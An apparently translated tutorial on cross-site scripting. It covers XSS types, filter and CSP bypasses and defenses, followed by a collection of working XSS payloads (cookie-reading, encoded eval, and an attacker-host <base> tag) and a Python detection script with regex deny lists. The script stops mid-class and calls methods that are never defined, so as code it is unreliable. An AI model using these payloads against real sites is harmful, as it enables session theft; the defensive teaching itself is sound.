A Look at XSS Principles and Classification — with a Payload Collection and Detection/Defense Ideas


Cross-site scripting (XSS) is one of the oldest and most widespread vulnerabilities in Web security. Its essence is a blurred boundary between data and code: an attacker injects a malicious script (usually JavaScript) into a web application as data, and when the browser renders the page, that data is executed as code, leading to information theft, session hijacking, and other consequences.

I. Principles and Classification

The root cause of XSS is untrusted data being injected, unfiltered, into an HTML/JS context.

1. Reflected XSS

  • Characteristics: non-persistent. The malicious script reaches the server via URL parameters or form submissions, and the server "reflects" it back into the response page.

  • Trigger: the victim must be lured into clicking a malicious link (often combined with phishing or URL shorteners).

  • Example:

    // vulnerable code
    echo "Welcome: " . $_GET['name'];
    

    Passing name=<script>alert(1)</script> makes the script execute directly.

2. Stored XSS

  • Characteristics: persistent. The malicious script is stored on the backend (database, file system, etc.) and is loaded and executed whenever other users visit the affected page.
  • Impact: wide blast radius; common in comment sections, profile fields, forum posts, and similar features.
  • Example: an attacker posts <script>stealCookie()</script> on a message board; every user who views the board is compromised.

3. DOM-based XSS

  • Characteristics: happens entirely on the client side, without touching server-side logic. The malicious script is injected by manipulating the page's DOM environment (such as location.hash, document.referrer, innerHTML).

  • Distinction: the server response is indistinguishable from a normal page; the malicious code executes locally in the client.

  • Example:

    // vulnerable code
    var hash = location.hash.slice(1);
    document.getElementById("output").innerHTML = hash;
    

    Visiting page.html#<img src=x onerror=alert(1)> triggers it.

II. Bypass Techniques (Advanced)

Defensive mechanisms (input filtering, output encoding, CSP) keep evolving, and attackers have accumulated a matching toolbox of bypasses. Classic and modern approaches include:

1. Context-aware bypasses

  • Inside an HTML tag attribute: when the output lands in an attribute (e.g. <input value="...">), close the quote early and inject a new event handler:

    " onmouseover="alert(1)
    
  • Inside JavaScript code: if the output lands inside a <script> tag, break out of the string literal or abuse template literals:

    var name = 'USER_INPUT'; // injecting ';alert(1);// escapes the string
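
To make the escape concrete, here is a small Python sketch (a hypothetical naive server-side template, not from any real framework) showing how that input breaks out of the JS string literal:

```python
# Hypothetical naive templating: user input pasted into a JS string literal.
user = "';alert(1);//"
rendered = "var name = '%s';" % user

# The leading quote closes the literal, alert(1) runs as code,
# and // comments out the trailing quote.
print(rendered)  # var name = '';alert(1);//';
```

Escaping quotes and backslashes (or JSON-encoding the value) keeps the data inside the literal.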
    

2. Encoding bypasses

  • HTML entity encoding: some filters only check for < and >, but browsers decode entities first when parsing HTML attributes:

    <img src=x onerror="&#97;&#108;&#101;&#114;&#116;(1)">
    
  • Unicode/URL encoding: usable inside the javascript: pseudo-protocol or data: URIs.

  • Multiple encoding: against pipelines that decode recursively, apply URL encoding twice so that a filter's single decode still sees harmless text.
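
The double-encoding idea can be reproduced with the standard library alone; this sketch shows a filter that decodes once seeing only harmless percent-sequences, while a later component's second decode restores the payload:

```python
from urllib.parse import quote, unquote

payload = "<script>alert(1)</script>"
double_encoded = quote(quote(payload, safe=""), safe="")

after_one_decode = unquote(double_encoded)
assert "<script" not in after_one_decode     # a single-pass filter sees nothing
assert unquote(after_one_decode) == payload  # the second decode reveals it
```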

3. Event handler and pseudo-protocol abuse

  • Event handlers: onload, onerror, onfocus, onpointermove, and so on (HTML5 added many new ones).

  • Pseudo-protocols:

    <a href="javascript:alert(1)">click</a>
    <iframe src="javascript:alert(1)">
    
  • <svg> / <math> tags: scripts are allowed inside them, and filters often treat them leniently:

    <svg><script>alert(1)</script>
    

4. Defeating filters

  • Mixed case: <ScRiPt> defeats naive blacklists.
  • Double writing: <scr<script>ipt> works when the filter strips the tag only once.
  • Newlines and spaces: <script \n src="..."> may slip past some regexes.
  • Character truncation: use %00, /, or Unicode control characters to disrupt regex matching.
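
The double-writing trick above is easy to verify; this minimal Python model (hypothetical filter functions, not a real WAF) contrasts single-pass removal with removal repeated until stable:

```python
def strip_once(s):
    # Naive filter: removes the literal tag a single time.
    return s.replace("<script>", "")

def strip_until_stable(s):
    # Robust variant: repeat until the input stops changing.
    prev = None
    while prev != s:
        prev, s = s, s.replace("<script>", "")
    return s

assert strip_once("<scr<script>ipt>") == "<script>"  # the payload reassembles itself
assert strip_until_stable("<scr<script>ipt>") == ""
```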

5. Abusing browser behavior

  • <base> tag: changes the base URL for relative paths, hijacking resource loading.
  • <link> / @import: load an external stylesheet, combined with expression() (legacy IE) or behavior.
  • <template> / <iframe>: bypass some AST-based XSS filters.

6. DOM-specific vectors

  • Second-order injection through document.write / innerHTML.
  • window.name and postMessage carrying malicious data across origins.
  • Unfiltered data stored in localStorage / sessionStorage.

7. Exploiting CSP weaknesses

  • If the CSP keeps unsafe-inline, or permits data: / blob:, vectors like this remain available:

    <a href="data:text/html,<script>alert(1)</script>">click</a>
    
  • Misconfigured policies: e.g. whitelisting *.cdn.com lets an attacker serve a malicious script from that CDN.
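
data: URIs usually carry the script base64-encoded, as in the <object data=...> entry in the payload collection below; decoding one such string shows exactly what the browser would execute:

```python
import base64

b64 = "PHNjcmlwdD5hbGVydCgiWHNzVGVzdCIpOzwvc2NyaXB0Pg=="
decoded = base64.b64decode(b64).decode("utf-8")
print(decoded)  # <script>alert("XssTest");</script>
```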

III. Defense System (Defense in Depth)

XSS defense must treat output encoding as the foundation and layer additional security mechanisms on top.

1. Core principle: context-aware output encoding

  • HTML entity encoding: convert < > " ' & into &lt; and friends, for HTML body content.
  • HTML attribute encoding: encode special characters inside attribute values (watch the quotes in particular).
  • JavaScript string encoding: escape backticks, ' " \n and similar characters so user data cannot break out of the string literal.
  • URL encoding: encode URL parameter values to block javascript: pseudo-protocol injection.
  • CSS encoding: strictly filter or encode any user input that lands in style attributes.

Recommendation: use a mature template engine (React's JSX, Vue templates, Jinja2); they apply context-aware escaping to output by default.
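
As a stdlib-only sketch of context-aware encoding (real projects should lean on the template engine's auto-escaping), the same payload needs a different encoder per context:

```python
import html
from urllib.parse import quote

payload = '"><script>alert(1)</script>'

# HTML body/attribute context: entity-encode the metacharacters.
html_safe = html.escape(payload, quote=True)
assert html_safe == "&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;"

# URL parameter context: percent-encode everything outside the unreserved set.
url_safe = quote(payload, safe="")
assert "<" not in url_safe and '"' not in url_safe
```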

2. Input filtering (a supporting measure)

  • Strict whitelisting: for rich text, sanitize with a security-tested library (such as DOMPurify), allowing only safe tags and attributes.
  • Type validation: an age field must be numeric, an email must match the expected format.

Note: input filtering cannot be the primary defense; the business may legitimately need to keep special characters, and filtering logic is complex and easy to get wrong.
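
Whitelist-style type validation takes only a few lines; note the email pattern below is a deliberately simplified assumption, not a full RFC 5322 validator:

```python
import re

def is_valid_age(value):
    # Whitelist: digits only, within a plausible range.
    return value.isdigit() and 0 < int(value) < 150

# Simplified email shape: local@domain.tld (illustrative only).
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(\.[\w-]+)+")

def is_valid_email(value):
    return EMAIL_RE.fullmatch(value) is not None

assert is_valid_age("25")
assert not is_valid_age("<script>alert(1)</script>")
assert is_valid_email("user@example.com")
assert not is_valid_email("javascript:alert(1)")
```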

3. Security headers

  • CSP (Content Security Policy):
    Configure the Content-Security-Policy header, disable unsafe-inline and unsafe-eval, and allow inline scripts only through a nonce or hash mechanism.

    Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.cdn.com 'nonce-<random-value>'
    
  • HttpOnly: set the HttpOnly attribute on cookies so malicious scripts cannot read the session token through document.cookie.

  • X-XSS-Protection (deprecated, though some legacy browsers still honor it): X-XSS-Protection: 1; mode=block, as one more layer of defense.
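
Generating the per-response nonce is mechanical; a hedged sketch (the policy value mirrors the header example above, and the function name is illustrative):

```python
import secrets

def build_csp_header():
    # A fresh, unguessable nonce must be generated for every response.
    nonce = secrets.token_urlsafe(16)
    policy = (
        "default-src 'self'; "
        "script-src 'self' https://trusted.cdn.com 'nonce-%s'" % nonce
    )
    return nonce, policy

nonce, policy = build_csp_header()
# The same nonce is then stamped onto each legitimate <script nonce="..."> tag.
assert ("'nonce-%s'" % nonce) in policy
```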

4. Other practices

  • Use a modern framework: React, Vue, Angular, etc. escape interpolated content by default; avoid direct DOM manipulation (treat v-html and dangerouslySetInnerHTML with caution).
  • Never put user content into dynamically executed JavaScript: eval(), setTimeout(someUserInput), the Function() constructor.
  • Cookie security: critical cookies should carry the Secure and SameSite=Strict/Lax attributes.
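
The cookie flags can be emitted with the standard library; a short sketch using http.cookies (SameSite support needs Python 3.8+; the token value is a placeholder):

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "opaque-token"        # placeholder value
cookie["session"]["httponly"] = True      # hidden from document.cookie
cookie["session"]["secure"] = True        # only sent over HTTPS
cookie["session"]["samesite"] = "Strict"

header = cookie.output(header="Set-Cookie:")
assert "HttpOnly" in header
assert "Secure" in header
assert "SameSite=Strict" in header
```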

IV. Payload Collection

'level1.php?name=<img src=1 onerror=alert(1)>
"><scrscriptipt>alert(1)</scrscriptipt>
<svg%0Aonload=alert(1)>
?arg01=a&arg02=b onmousemove='alert(1)'
?arg01=a&arg02=b onclick='alert(1)'
"><a HrEf=javascript:alert(1)>
"><a href=javascript:alert(1)>
' onclick='alert(1)
" onclick="alert(1)
"><script>alert(1)</script>

<script>alert(1)</script>
<svg onload=alert(1)>
<img src=x onerror=alert(1)>
<a href=javascript:alert(1)>
<iframe src="javascript:alert(1)"></iframe>

<script>alert(document.cookie)</script>
<script>prompt(document.cookie)</script>
<script>confirm(/xss/)</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;       // decimal entity encoding; hex, URL, JS, and HTML-entity encodings also work
<script>alert/*dsa*/(1)</script>   // comment trick, blacklist bypass
<script>(alert)(1)</script>        // parentheses wrapper, blacklist bypass
<svg onload="alert(1)">  
<body onload="alert('xss')">    // when 'script' is filtered
"><svg/onload=alert(1)
<svg onmousemove="alert(1)">
<IMG SRC="" onerror="alert('XSS')">
<IMG SRC="" onerror="javascript:alert('XSS');">

<input value="1" autofocus onfocus=alert(1)  x="">   // when 'script' is filtered
<iframe src="javascript:alert(1)"></iframe>      // when 'script' is filtered
<input name="name" value="" onmousemove=prompt(document.cookie) >
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<input type = "button"  value ="clickme" onclick="alert('click me')" />


Tab and other control characters to bypass filters:
<IMG SRC="" onerror="jav&#x9;ascript:alert('XSS');">
1.<iframe src=javas&#9;cript:alert(1)></iframe> // Tab
2.<iframe src=javas&#13;cript:alert(1)></iframe> // carriage return
3.<iframe src=javas&#10;cript:alert(1)></iframe> // line feed
4.<iframe src=javascript&#058;alert(1)></iframe> // encoded colon
5.<iframe src=javascript&colon;alert(1)></iframe> // HTML5 named entity, not supported in IE6/7
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWHNzVGVzdCIpOzwvc2NyaXB0Pg=="></object>
"><img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59))">

<script>onerror=alert;throw document.cookie</script>
<script>{onerror=alert}throw 1337</script>         // when quotes and parentheses are filtered but 'script' is not
<a href="" onclick="alert(1111)">
' onclick=alert(1111) '   // mouse-click event handler executes JavaScript

<iframe src="javascript:alert(1)">
<object data="javascript:alert(1)">
<input onfocus=alert(1) autofocus>
<details open ontoggle=alert(1)>
<video><source onerror=alert(1)>

<script src="/api/jsonp?callback=alert(1)"></script>
<base href="https://attacker.com/">
<script src="/jquery.js"></script>
<link rel="preload" as="script" href="data:;base64,YWxlcnQoMSk=" onload="eval(this.href.split(',')[1])">
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
navigator.serviceWorker.register('/sw.js?script=alert(1)')
  • Automated scanning: use tools such as Burp Suite, OWASP ZAP, or XSStrike for initial probing.
  • Manual testing: for every input point, try payloads for each context (HTML, attribute, JS, URL, CSS).
  • Code audit: focus on dangerous functions such as innerHTML, document.write, eval, setTimeout, and on backend output points that skip encoding.

V. Detection and Defense Ideas

A quick summary by dimension:

  • Principle: data gets interpreted as code (HTML/JS context confusion)
  • Classification: reflected, stored, DOM-based (by persistence and trigger mechanism)
  • Bypasses: context escapes, encoding obfuscation, filter evasion, browser-quirk abuse, CSP misconfiguration
  • Defense: contextual output encoding (core) + CSP + HttpOnly + input whitelisting + safe frameworks

At its heart, XSS is a trust problem: never trust user input, and never trust external data. Separating data from code through output encoding, backed by defense-in-depth measures, reduces XSS risk to a minimum. As Web standards evolve, CSP has become a powerful weapon for modern applications against XSS; new projects should enable a strict CSP by default.

Below is a detection and protection script based on rule matching and semantic analysis, written with the help of coding agents such as CC; it runs on Python 3.12.

Detection script

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
XSS (Cross-Site Scripting) Detection and Protection System
Based on rule matching and semantic analysis principles
Requires Python 3

Author: Security Tool
Version: 1.0.0
"""

import re


class RiskLevel:
    """Risk level enumeration for XSS threats"""
    SAFE = "safe"
    LOW = "low"
    MEDIUM = "medium"
    HIGH = "high"
    CRITICAL = "critical"


class DetectionResult:
    """Result of XSS detection analysis"""
    def __init__(self, is_xss, risk_level, matched_patterns, attack_types,
                 analysis_details, recommendations, sanitized_input=None):
        self.is_xss = is_xss
        self.risk_level = risk_level
        self.matched_patterns = matched_patterns
        self.attack_types = attack_types
        self.analysis_details = analysis_details
        self.recommendations = recommendations
        self.sanitized_input = sanitized_input


class XSSDetector:
    """
    XSS Detector based on rule matching and semantic analysis
    """
    
    XSS_ATTACK_TYPES = {
        "reflected": {"name": "Reflected XSS", "description": "Direct reflection of unsanitized input", "severity": RiskLevel.HIGH},
        "stored": {"name": "Stored XSS", "description": "Malicious script stored in database", "severity": RiskLevel.CRITICAL},
        "dom": {"name": "DOM-based XSS", "description": "Client-side DOM manipulation", "severity": RiskLevel.HIGH},
        "vector": {"name": "XSS Vector", "description": "Common XSS attack vector", "severity": RiskLevel.HIGH},
        "bypass": {"name": "Filter Bypass", "description": "Attempting to bypass security filters", "severity": RiskLevel.CRITICAL},
    }

    def __init__(self):
        self.rules = self._init_detection_rules()
        self.dangerous_tags = self._init_dangerous_tags()
        self.dangerous_attributes = self._init_dangerous_attributes()
        self.javascript_protocols = self._init_javascript_protocols()

    def _init_detection_rules(self):
        """Initialize XSS detection rules with patterns"""
        return [
            {
                'name': 'Script Tag Injection',
                'pattern': r'<script[^>]*>.*?</script>',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'Direct script tag injection',
                'case_insensitive': True,
                'dotall': True
            },
            {
                'name': 'Script Tag Self-Closing',
                'pattern': r'<script[^>]*/?>',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'Self-closing script tag',
                'case_insensitive': True
            },
            {
                'name': 'Event Handler on*',
                'pattern': r'\bon\w+\s*=',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'Event handler attribute injection (onclick, onload, etc.)',
                'case_insensitive': True
            },
            {
                'name': 'Event Handler JavaScript',
                'pattern': r'<[^>]+\s+on\w+\s*=\s*["\']?javascript:',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'bypass',
                'description': 'Event handler with javascript: protocol',
                'case_insensitive': True
            },
            {
                'name': 'JavaScript Protocol',
                'pattern': r'javascript\s*:',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'JavaScript protocol handler',
                'case_insensitive': True
            },
            {
                'name': 'JavaScript Protocol in href',
                'pattern': r'href\s*=\s*["\']?\s*javascript:',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'JavaScript protocol in href attribute',
                'case_insensitive': True
            },
            {
                'name': 'Data URI Scheme',
                'pattern': r'data\s*:\s*text/html',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Data URI with HTML content',
                'case_insensitive': True
            },
            {
                'name': 'Iframe Injection',
                'pattern': r'<iframe[^>]*>',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Iframe tag injection',
                'case_insensitive': True
            },
            {
                'name': 'Iframe with JavaScript',
                'pattern': r'<iframe[^>]*src\s*=\s*["\']?\s*javascript:',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'bypass',
                'description': 'Iframe with javascript: source',
                'case_insensitive': True
            },
            {
                'name': 'Object Tag',
                'pattern': r'<object[^>]*>',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Object tag injection',
                'case_insensitive': True
            },
            {
                'name': 'Embed Tag',
                'pattern': r'<embed[^>]*>',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Embed tag injection',
                'case_insensitive': True
            },
            {
                'name': 'Applet Tag',
                'pattern': r'<applet[^>]*>',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Java applet injection',
                'case_insensitive': True
            },
            {
                'name': 'Form Action Injection',
                'pattern': r'<form[^>]*action\s*=\s*["\']?\s*javascript:',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'Form with javascript: action',
                'case_insensitive': True
            },
            {
                'name': 'Body onload Event',
                'pattern': r'<body[^>]*onload\s*=',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Body onload event handler',
                'case_insensitive': True
            },
            {
                'name': 'Meta Refresh Redirect',
                'pattern': r'<meta[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']?\s*\d+\s*;\s*url\s*=',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Meta refresh with URL redirect',
                'case_insensitive': True,
                'dotall': True
            },
            {
                'name': 'Link Import',
                'pattern': r'<link[^>]*rel\s*=\s*["\']?\s*import["\']?',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Link tag with import',
                'case_insensitive': True
            },
            {
                'name': 'SVG with Script',
                'pattern': r'<svg[^>]*>.*?<script',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'SVG with embedded script',
                'case_insensitive': True,
                'dotall': True
            },
            {
                'name': 'SVG onload Event',
                'pattern': r'<svg[^>]*on\w+\s*=',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'SVG with event handler',
                'case_insensitive': True
            },
            {
                'name': 'IE Expression',
                'pattern': r'expression\s*\(',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'IE CSS expression',
                'case_insensitive': True
            },
            {
                'name': 'VBScript Protocol',
                'pattern': r'vbscript\s*:',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'VBScript protocol handler',
                'case_insensitive': True
            },
            {
                'name': 'Angular Binding',
                'pattern': r'{{.*?}}',
                'risk': RiskLevel.MEDIUM,
                'attack_type': 'vector',
                'description': 'Angular template binding',
                'case_insensitive': False
            },
            {
                'name': 'Angular ng-',
                'pattern': r'ng-\w+',
                'risk': RiskLevel.MEDIUM,
                'attack_type': 'vector',
                'description': 'Angular directive',
                'case_insensitive': True
            },
            {
                'name': 'HTML Entity Encoding',
                'pattern': r'&#\d+;|&#x[0-9a-fA-F]+;',
                'risk': RiskLevel.MEDIUM,
                'attack_type': 'bypass',
                'description': 'HTML entity encoding attempt',
                'case_insensitive': True
            },
            {
                'name': 'Null Byte Injection',
                'pattern': r'\x00|%00',
                'risk': RiskLevel.MEDIUM,
                'attack_type': 'bypass',
                'description': 'Null byte injection attempt',
                'case_insensitive': False
            },
            {
                'name': 'Unicode Escape',
                'pattern': r'\\u[0-9a-fA-F]{4}',
                'risk': RiskLevel.MEDIUM,
                'attack_type': 'bypass',
                'description': 'Unicode escape sequence',
                'case_insensitive': True
            },
            {
                'name': 'CSS Expression',
                'pattern': r'url\s*\(\s*["\']?\s*javascript:',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'CSS URL with javascript:',
                'case_insensitive': True
            },
            {
                'name': 'Base Tag',
                'pattern': r'<base[^>]*href\s*=\s*["\']?',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Base tag for relative URL hijacking',
                'case_insensitive': True
            },
            {
                'name': 'SVG use',
                'pattern': r'<use[^>]*href\s*=\s*["\']?\s*javascript:',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'bypass',
                'description': 'SVG use with javascript: href',
                'case_insensitive': True
            },
            {
                'name': 'Animation Event',
                'pattern': r'onanimation\w+\s*=',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'CSS animation event handler',
                'case_insensitive': True
            },
            {
                'name': 'Cookie Access',
                'pattern': r'document\.cookie',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Document cookie access',
                'case_insensitive': True
            },
            {
                'name': 'LocalStorage Access',
                'pattern': r'localStorage|sessionStorage',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Web storage access',
                'case_insensitive': True
            },
            {
                'name': 'InnerHTML Assignment',
                'pattern': r'innerHTML\s*=',
                'risk': RiskLevel.HIGH,
                'attack_type': 'dom',
                'description': 'innerHTML DOM manipulation',
                'case_insensitive': True
            },
            {
                'name': 'Document Write',
                'pattern': r'document\.write\s*\(',
                'risk': RiskLevel.HIGH,
                'attack_type': 'dom',
                'description': 'document.write usage',
                'case_insensitive': True
            },
            {
                'name': 'Eval Usage',
                'pattern': r'\beval\s*\(',
                'risk': RiskLevel.HIGH,
                'attack_type': 'dom',
                'description': 'eval() function usage',
                'case_insensitive': True
            },
            {
                'name': 'Location Assignment',
                'pattern': r'location\.(href|replace|assign)\s*=\s*["\']?\s*javascript:',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'Location with javascript: protocol',
                'case_insensitive': True
            },
            {
                'name': 'Alert Pattern',
                'pattern': r'\balert\s*\(',
                'risk': RiskLevel.LOW,
                'attack_type': 'vector',
                'description': 'Common XSS test pattern',
                'case_insensitive': True
            },
            {
                'name': 'Img onerror',
                'pattern': r'<img[^>]*onerror\s*=',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector',
                'description': 'Image onerror event handler',
                'case_insensitive': True
            },
            {
                'name': 'Img src',
                'pattern': r'<img[^>]*src\s*=\s*["\']?\s*(javascript:|data:)',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'bypass',
                'description': 'Image with dangerous src',
                'case_insensitive': True
            },
            {
                'name': 'Video onerror',
                'pattern': r'<(video|audio)[^>]*onerror\s*=',
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector',
                'description': 'Video/audio onerror event',
                'case_insensitive': True
            },
        ]

    def _init_dangerous_tags(self):
        """Initialize list of dangerous HTML tags"""
        return [
            'script', 'iframe', 'object', 'embed', 'applet', 'form',
            'input', 'button', 'select', 'textarea', 'isindex',
            'link', 'base', 'meta', 'head', 'body', 'svg', 'math',
            'video', 'audio', 'source', 'track', 'canvas', 'map',
            'area', 'param', 'bgsound', 'blink', 'comment', 'listing',
            'marquee', 'xmp', 'plaintext', 'noembed', 'noscript'
        ]

    def _init_dangerous_attributes(self):
        """Initialize list of dangerous HTML attributes"""
        return [
            'onclick', 'ondblclick', 'onmousedown', 'onmouseup', 'onmouseover',
            'onmousemove', 'onmouseout', 'onkeydown', 'onkeypress', 'onkeyup',
            'onload', 'onunload', 'onfocus', 'onblur', 'onsubmit', 'onreset',
            'onselect', 'onchange', 'onerror', 'onabort', 'onresize',
            'onscroll', 'oncontextmenu', 'onmouseenter', 'onmouseleave',
            'onfocusin', 'onfocusout', 'onanimationstart', 'onanimationend',
            'onanimationiteration', 'ontransitionend'
        ]

    def _init_javascript_protocols(self):
        """Initialize list of dangerous protocols"""
        return [
            'javascript:', 'vbscript:', 'data:', 'mocha:', 'livescript:',
            'expression:', 'behavior:', 'x-script:'
        ]

    def detect(self, user_input, context="general"):
        """
        Main detection method - analyzes input for XSS threats
        
        Args:
            user_input: The input string to analyze
            context: The context where input will be used (general, html, js, url, etc.)
            
        Returns:
            DetectionResult with analysis details
        """
        import re
        
        matched_rules = []
        attack_types = []
        risk_levels = []
        
        for rule in self.rules:
            pattern = rule['pattern']
            flags = re.IGNORECASE if rule.get('case_insensitive') else 0
            if rule.get('dotall'):
                flags |= re.DOTALL
                
            if re.search(pattern, user_input, flags):
                matched_rules.append({
                    'name': rule['name'],
                    'description': rule['description'],
                    'risk': rule['risk'],
                    'attack_type': rule['attack_type']
                })
                risk_levels.append(rule['risk'])
                
                if rule['attack_type'] not in attack_types:
                    attack_types.append(rule['attack_type'])

        semantic_analysis = self._semantic_analysis(user_input, context)
        matched_rules.extend(semantic_analysis['additional_rules'])
        risk_levels.extend(semantic_analysis['additional_risks'])
        
        if semantic_analysis['attack_types']:
            attack_types.extend(semantic_analysis['attack_types'])

        final_risk = self._calculate_final_risk(risk_levels)
        is_xss = len(matched_rules) > 0 or final_risk != RiskLevel.SAFE

        recommendations = self._generate_recommendations(
            matched_rules, 
            semantic_analysis,
            context
        )

        return DetectionResult(
            is_xss=is_xss,
            risk_level=final_risk,
            matched_patterns=[r['name'] for r in matched_rules],
            attack_types=list(set(attack_types)),
            analysis_details=self._generate_analysis_report(
                matched_rules, 
                semantic_analysis,
                context
            ),
            recommendations=recommendations,
            sanitized_input=None
        )

    def _semantic_analysis(self, user_input, context):
        """Perform semantic analysis on the input"""
        import re
        
        additional_rules = []
        additional_risks = []
        detected_attack_types = []
        details = {}

        if self._has_unbalanced_tags(user_input):
            additional_rules.append({
                'name': 'Unbalanced HTML Tags',
                'description': 'Detected potentially malicious unbalanced tags',
                'risk': RiskLevel.MEDIUM,
                'attack_type': 'bypass'
            })
            additional_risks.append(RiskLevel.MEDIUM)
            detected_attack_types.append('bypass')

        dangerous_tag_analysis = self._analyze_dangerous_tags(user_input)
        if dangerous_tag_analysis['found']:
            additional_rules.append({
                'name': 'Dangerous Tag Usage',
                'description': "Found dangerous tags: %s" % ", ".join(dangerous_tag_analysis['tags'][:5]),
                'risk': RiskLevel.HIGH,
                'attack_type': 'vector'
            })
            additional_risks.append(RiskLevel.HIGH)
            detected_attack_types.append('vector')

        event_handler_analysis = self._analyze_event_handlers(user_input)
        if event_handler_analysis['found']:
            additional_rules.append({
                'name': 'Event Handler Detection',
                'description': "Found event handlers: %s" % ", ".join(event_handler_analysis['handlers'][:5]),
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'vector'
            })
            additional_risks.append(RiskLevel.CRITICAL)
            detected_attack_types.append('vector')

        protocol_analysis = self._analyze_protocols(user_input)
        if protocol_analysis['found']:
            additional_rules.append({
                'name': 'Dangerous Protocol Handler',
                'description': "Found dangerous protocols: %s" % ", ".join(protocol_analysis['protocols']),
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'bypass'
            })
            additional_risks.append(RiskLevel.CRITICAL)
            detected_attack_types.append('bypass')

        encoding_analysis = self._analyze_encoding(user_input)
        if encoding_analysis['found']:
            additional_rules.append({
                'name': 'Encoding Obfuscation',
                'description': "Found encoding: %s" % ", ".join(encoding_analysis['types']),
                'risk': RiskLevel.MEDIUM,
                'attack_type': 'bypass'
            })
            additional_risks.append(RiskLevel.MEDIUM)
            detected_attack_types.append('bypass')

        if context == "js":
            js_context_analysis = self._analyze_js_context(user_input)
            additional_rules.extend(js_context_analysis['rules'])
            additional_risks.extend(js_context_analysis['risks'])
            
        elif context == "url":
            url_context_analysis = self._analyze_url_context(user_input)
            additional_rules.extend(url_context_analysis['rules'])
            additional_risks.extend(url_context_analysis['risks'])

        dom_analysis = self._analyze_dom_patterns(user_input)
        if dom_analysis['found']:
            additional_rules.append({
                'name': 'DOM Manipulation Pattern',
                'description': 'Found potential DOM manipulation',
                'risk': RiskLevel.HIGH,
                'attack_type': 'dom'
            })
            additional_risks.append(RiskLevel.HIGH)
            detected_attack_types.append('dom')

        return {
            'additional_rules': additional_rules,
            'additional_risks': additional_risks,
            'attack_types': detected_attack_types,
            'details': details
        }

    def _has_unbalanced_tags(self, text):
        """Check for unbalanced HTML tags"""
        import re
        tag_pattern = r'<(/?)([\w]+)[^>]*>'
        tags = re.findall(tag_pattern, text, re.IGNORECASE)
        
        open_tags = []
        for is_closing, tag_name in tags:
            tag_name = tag_name.lower()
            if is_closing:
                if tag_name in open_tags:
                    open_tags.remove(tag_name)
            else:
                if tag_name in self.dangerous_tags:
                    if not tag_name.startswith('!'):
                        open_tags.append(tag_name)
        
        return len(open_tags) > 0

    def _analyze_dangerous_tags(self, text):
        """Analyze dangerous HTML tag usage"""
        import re
        found_tags = []
        
        for tag in self.dangerous_tags:
            pattern = r'<\s*' + tag + r'[\s>]'
            if re.search(pattern, text, re.IGNORECASE):
                found_tags.append(tag)
        
        return {
            'found': len(found_tags) > 0,
            'tags': found_tags
        }

    def _analyze_event_handlers(self, text):
        """Analyze event handler usage"""
        import re
        found_handlers = []
        
        for handler in self.dangerous_attributes:
            pattern = r'\b' + handler + r'\s*='
            if re.search(pattern, text, re.IGNORECASE):
                found_handlers.append(handler)
        
        return {
            'found': len(found_handlers) > 0,
            'handlers': found_handlers[:5]
        }

    def _analyze_protocols(self, text):
        """Analyze dangerous protocol handlers"""
        found_protocols = []
        
        for protocol in self.javascript_protocols:
            if protocol in text.lower():
                found_protocols.append(protocol)
        
        return {
            'found': len(found_protocols) > 0,
            'protocols': found_protocols
        }

    def _analyze_encoding(self, text):
        """Analyze encoding attempts"""
        import re
        encoding_types = []
        
        if re.search(r'&#\d+;|&#x[0-9a-fA-F]+;', text):
            encoding_types.append('HTML Entity')
        
        if re.search(r'%[0-9a-fA-F]{2}', text):
            encoding_types.append('URL')
        
        if re.search(r'\\u[0-9a-fA-F]{4}', text):
            encoding_types.append('Unicode')
        
        return {
            'found': len(encoding_types) > 0,
            'types': encoding_types
        }

